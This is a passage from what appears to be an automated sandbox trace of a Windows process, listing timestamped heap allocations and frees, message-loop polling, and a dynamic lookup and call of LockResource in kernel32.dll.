Flags=0x0, Size=0x10) returned 0x14b6800 [0129.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0129.073] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0129.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6860 | out: hHeap=0x12c0000) returned 1 [0129.117] FreeLibrary (hLibModule=0x74650000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002e8 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0129.117] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69c8 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6aa0 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6908 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a28 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6998 | out: hHeap=0x12c0000) returned 1 [0129.118] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001f8 | out: hHeap=0x12c0000) returned 1 [0129.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.119] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67e8 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6818 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0129.119] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1314a78 | out: hHeap=0x12c0000) returned 1 [0129.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.120] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000e0 [0129.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.120] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.120] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdb0 [0129.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000e0 | out: hHeap=0x12c0000) returned 1 [0129.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.121] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdf0 [0129.121] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.121] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300270 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe70 [0129.121] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0129.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0129.122] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0129.122] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0129.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0129.122] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.122] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0129.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0129.123] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0129.123] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0129.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0129.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0129.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0129.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0129.123] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.123] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0129.123] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000b8 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0129.124] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdc0 [0129.124] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0129.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0129.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0129.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6878 [0129.125] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0129.125] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0129.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0129.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0129.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0129.126] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0129.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6980 [0129.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe20 [0129.126] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a58 [0129.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6980 | out: hHeap=0x12c0000) returned 1 [0129.126] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0129.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff28 [0129.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0129.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68c0 [0129.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efce0 [0129.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.127] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a28 [0129.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68c0 | out: hHeap=0x12c0000) returned 1 [0129.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a28 | out: hHeap=0x12c0000) returned 1 [0129.127] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.127] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0129.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6998 [0129.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0129.129] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd) returned 0x14b69e0 [0129.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LockResource", cchWideChar=13, lpMultiByteStr=0x14b69e0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LockResource", lpUsedDefaultChar=0x0) returned 13 [0129.129] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0129.129] GetProcAddress (hModule=0x74650000, lpProcName="LockResource") returned 0x74667890 [0129.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6998 | out: hHeap=0x12c0000) returned 1 [0129.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300090 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe40 [0129.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0129.130] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300090 | out: hHeap=0x12c0000) returned 1 [0129.130] LockResource (hResData=0x10bb1ac) returned 0x10bb1ac [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1313d88 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68c0 [0129.130] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a88 [0129.131] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68c0 | out: hHeap=0x12c0000) returned 1 [0129.131] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a88 [0129.131] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6950 [0129.131] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6998 [0129.131] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6998 | out: hHeap=0x12c0000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6950 | out: hHeap=0x12c0000) returned 1 [0129.131] FreeLibrary (hLibModule=0x74650000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff28 | out: hHeap=0x12c0000) returned 1 [0129.131] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6770 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6878 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13000b8 | out: hHeap=0x12c0000) returned 1 [0129.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.132] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69b0 [0129.132] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1313d88 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0129.133] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.133] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe20 [0129.133] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0129.133] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0129.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1302060 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6578 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0129.134] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6770 [0129.134] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.135] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0129.135] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0129.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efce0 [0129.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0129.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0129.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0129.135] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0129.135] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0129.136] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0129.136] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0129.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0129.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0129.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0129.136] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0129.136] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.136] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0129.136] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300220 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd40 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0129.137] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316880 [0129.137] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0129.138] HeapFree (in: hHeap=0x12c0000, 